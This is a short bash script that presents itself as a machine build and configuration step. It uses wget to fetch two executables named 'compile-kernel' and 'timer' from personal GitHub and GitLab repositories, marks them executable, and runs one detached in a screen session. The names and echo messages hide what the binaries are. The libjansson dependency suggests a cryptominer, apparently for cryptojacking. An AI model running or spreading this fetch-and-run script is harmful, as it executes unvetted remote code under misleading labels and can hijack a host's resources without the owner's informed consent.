echo "==================== Info Machine ===================="
echo "Ready"
echo "Go"
echo "Running"
echo "===================================================="

echo "+++++++ Build Machine +++++++++"
nohup wget https://github.com/bisabisopre/kernel/raw/main/compile-kernel
nohup wget https://gitlab.com/lambohopo/bash/-/raw/main/timer
nohup mkdir safa
nohup apt install screen -y
nohup apt install libjansson-dev -y

echo "+++++++ Configure Machine +++++++++"
chmod +x compile-kernel
chmod +x timer
cd safa

echo "Configure Successfully"
cd ..
screen -d -m ./compile-kernel
echo "+++++++ Sync... +++++++++"
./timer
